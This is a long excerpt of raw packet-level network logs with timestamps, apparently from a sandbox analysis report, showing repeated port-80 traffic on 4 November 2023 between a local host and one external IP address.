                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.555072069 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.555134058 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.556298018 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.556366920 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.559098959 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.559128046 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.559154034 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.559171915 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.561469078 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.561532021 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.563111067 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.563160896 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.563249111 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.563292027 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.564161062 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.564208031 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.567208052 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.567257881 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.567437887 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.567491055 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.567629099 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.567673922 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.567929029 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.568007946 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.570261002 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.570310116 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.572015047 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.572026968 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.572069883 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.574040890 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.574086905 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.579289913 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.579344988 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:18.892749071 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261219978 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261254072 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261264086 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261275053 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261285067 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261295080 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261305094 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261324883 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261353016 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261398077 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261399984 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261408091 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261464119 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.261523008 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266491890 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266511917 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266521931 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266527891 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266537905 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266547918 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266556978 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266566992 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266577005 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266586065 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266596079 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266604900 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266613960 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266623020 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266632080 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266640902 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266650915 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266659975 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266669035 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266678095 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266686916 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266695976 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266705036 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266705990 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266715050 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266726017 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266735077 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266743898 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266752958 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266762018 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266771078 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266779900 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266788006 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266793013 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266798019 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266807079 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266815901 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266824007 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266833067 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266841888 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266843081 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266851902 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266853094 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266863108 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266871929 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266872883 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266881943 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266891003 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266900063 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266908884 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266917944 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266927004 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266936064 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266946077 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266954899 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266963005 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266972065 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266983032 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.266983986 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.267029047 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491080046 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491106033 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491316080 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491632938 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491662979 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491699934 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491709948 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491719007 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491739035 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491759062 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491775990 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491800070 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491842031 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491878033 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491919041 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491919994 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491949081 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491957903 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491982937 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.491991997 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492002964 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492029905 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492042065 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492075920 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492113113 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492125034 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492144108 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492155075 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492189884 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492321968 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.492358923 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498605967 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498665094 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498693943 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498697996 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498717070 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498730898 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498742104 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498764038 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498779058 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498795033 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498805046 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498826027 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498838902 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498868942 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498948097 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.498979092 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499001026 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499008894 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499037981 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499039888 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499058962 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499070883 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499093056 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499100924 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499123096 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499130964 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499160051 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499190092 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499221087 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499242067 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499250889 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499279976 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499280930 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499290943 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499310017 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499330044 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499339104 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499346972 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499368906 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499382019 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499398947 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499412060 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.499445915 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.545505047 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.545540094 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.545619965 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.545650959 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.545664072 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.545718908 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.545718908 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.545778990 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.548892975 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.716382027 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.716486931 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.716557980 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.717286110 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.717339993 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.717356920 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.717385054 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.720092058 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.720149040 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.720165014 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.720165014 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.720165014 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.723167896 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.723200083 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.723218918 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.723253012 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.727252960 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.727307081 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.729522943 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.729571104 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.734606981 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.734657049 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.758284092 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.758444071 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779496908 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779532909 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779563904 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779604912 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779705048 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779721022 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779736996 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779759884 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779767990 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779779911 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.779814005 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.936780930 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.936808109 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.936860085 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.936882973 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.936928988 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.936966896 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.937088966 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.937124968 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.937268972 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.937319040 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.937619925 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.937643051 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.937670946 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.937695980 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.937958956 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.938002110 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.938317060 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.938369036 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.939348936 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.939394951 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.939493895 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.939542055 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.939959049 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.940005064 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.940325975 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.940368891 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.940845966 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.940893888 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941173077 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941215992 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941420078 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941430092 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941458941 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941469908 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941483974 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941507101 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941525936 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941565037 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941580057 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941800117 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941867113 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.941905022 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.943068027 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.943121910 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.947273016 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.947365999 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.954799891 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.954865932 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:19.999922037 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.000091076 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:20.000122070 CET8049731193.37.71.112192.168.2.4
